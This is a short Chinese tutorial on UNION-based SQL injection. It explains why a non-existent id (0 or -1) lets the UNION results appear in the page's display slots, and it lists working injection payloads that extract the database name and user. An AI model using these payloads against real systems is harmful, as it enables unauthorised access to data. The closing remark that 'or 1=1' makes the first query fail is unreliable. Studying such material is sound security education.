在SQL注入中，为什么union联合查询，id必须等于0

其实也不是非得让 id=0

?id=0' union select 1,2,3 --+		
?id=0' union select 1,database(),3 --+
?id=0' union select 1,database(),user() --+

这里的 id 需要格外注意：

如果只有两个回显位置

那么 id 必须填写一个不存在的数（-1或者0），联合查询才能回显成功

因为在数据表中，id 为 1，2，3，……

如果参数为：
?id=1' union select 1,2,3 --+

那么查询语句就是：
select * from users where id='1' union select 1,2,3 --+' limit 0,1

id=1 的数据被查询出来，返回到页面中，就占据了两个回显位

这个时候, union 查询的内容，会因为唯二的两个回显位被占据了，导致无法回显

如果 id=2，返回的内容也会占据回显位，导致 union 查询的内容无法回显到页面中

如果 id 为表中不存在的数，例如 id=0，id=-1 等等

那么查询语句就是：
select * from users where id='0' union select 1,2,3 --+' limit 0,1

因为 id=0 没有查询结果，所以页面中就返回 union 查询的内容

不一定要让 id=0

其实 id=-1，id=-5 等等都是可以的

所以，我们可以知道：

只要 union 前面的查询失败，那么 union 后面的查询结果就能回显到页面

id=1’ and 1=2 union select 1,2,3 –+  通过 and 1=2 语句来触发报错
id=1’ or 1=1 union select 1,2,3 –+   通过 or 1=1  语句来触发报错